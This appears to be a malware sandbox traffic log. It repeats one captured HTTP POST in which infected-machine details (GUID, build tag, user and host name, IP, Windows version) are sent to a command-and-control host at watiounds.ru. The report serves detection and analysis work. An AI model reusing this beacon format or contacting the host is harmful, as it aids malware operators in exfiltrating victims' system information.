              Source: global trafficHTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: watiounds.ruContent-Length: 110Cache-Control: no-cacheData Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29 Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
              Source: global trafficHTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: watiounds.ruContent-Length: 110Cache-Control: no-cacheData Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29 Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
              Source: global trafficHTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: watiounds.ruContent-Length: 110Cache-Control: no-cacheData Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29 Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
              Source: global trafficHTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: watiounds.ruContent-Length: 110Cache-Control: no-cacheData Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29 Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
              Source: global trafficHTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: watiounds.ruContent-Length: 110Cache-Control: no-cacheData Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29 Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
              Source: global trafficHTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: watiounds.ruContent-Length: 110Cache-Control: no-cacheData Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29 Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
              Source: global trafficHTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: watiounds.ruContent-Length: 110Cache-Control: no-cacheData Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29 Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
              Source: global trafficHTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: watiounds.ruContent-Length: 110Cache-Control: no-cacheData Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29 Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
              Source: global trafficHTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: watiounds.ruContent-Length: 110Cache-Control: no-cacheData Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29 Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
              Source: global trafficHTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: watiounds.ruContent-Length: 110Cache-Control: no-cacheData Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29 Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
              Source: global trafficHTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: watiounds.ruContent-Length: 110Cache-Control: no-cacheData Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29 Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
              Source: global trafficHTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: watiounds.ruContent-Length: 110Cache-Control: no-cacheData Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29 Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
              Source: global trafficHTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: watiounds.ruContent-Length: 110Cache-Control: no-cacheData Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29 Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
              Source: global trafficHTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: watiounds.ruContent-Length: 110Cache-Control: no-cacheData Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29 Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
              Source: global trafficHTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: watiounds.ruContent-Length: 110Cache-Control: no-cacheData Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29 Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
              Source: global trafficHTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: watiounds.ruContent-Length: 110Cache-Control: no-cacheData Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29 Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
              Source: global trafficHTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: watiounds.ruContent-Length: 110Cache-Control: no-cacheData Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29 Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
              Source: global trafficHTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: watiounds.ruContent-Length: 110Cache-Control: no-cacheData Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29 Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
              Source: global trafficHTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: watiounds.ruContent-Length: 110Cache-Control: no-cacheData Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29 Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
              Source: global trafficHTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: watiounds.ruContent-Length: 110Cache-Control: no-cacheData Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29 Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
              Source: global trafficHTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: watiounds.ruContent-Length: 110Cache-Control: no-cacheData Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29 Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
              Source: global trafficHTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: watiounds.ruContent-Length: 110Cache-Control: no-cacheData Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29 Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
              Source: global trafficHTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: watiounds.ruContent-Length: 110Cache-Control: no-cacheData Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29 Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
              Source: global trafficHTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: watiounds.ruContent-Length: 110Cache-Control: no-cacheData Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29 Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
              Source: global trafficHTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: watiounds.ruContent-Length: 110Cache-Control: no-cacheData Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29 Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
              Source: global trafficHTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: watiounds.ruContent-Length: 110Cache-Control: no-cacheData Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29 Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
              Source: global trafficHTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: watiounds.ruContent-Length: 110Cache-Control: no-cacheData Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29 Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
              Source: global trafficHTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: watiounds.ruContent-Length: 110Cache-Control: no-cacheData Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29 Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
              Source: global trafficHTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: watiounds.ruContent-Length: 110Cache-Control: no-cacheData Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29 Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
              Source: global trafficHTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: watiounds.ruContent-Length: 110Cache-Control: no-cacheData Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29 Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
              Source: global trafficHTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: watiounds.ruContent-Length: 110Cache-Control: no-cacheData Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29 Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
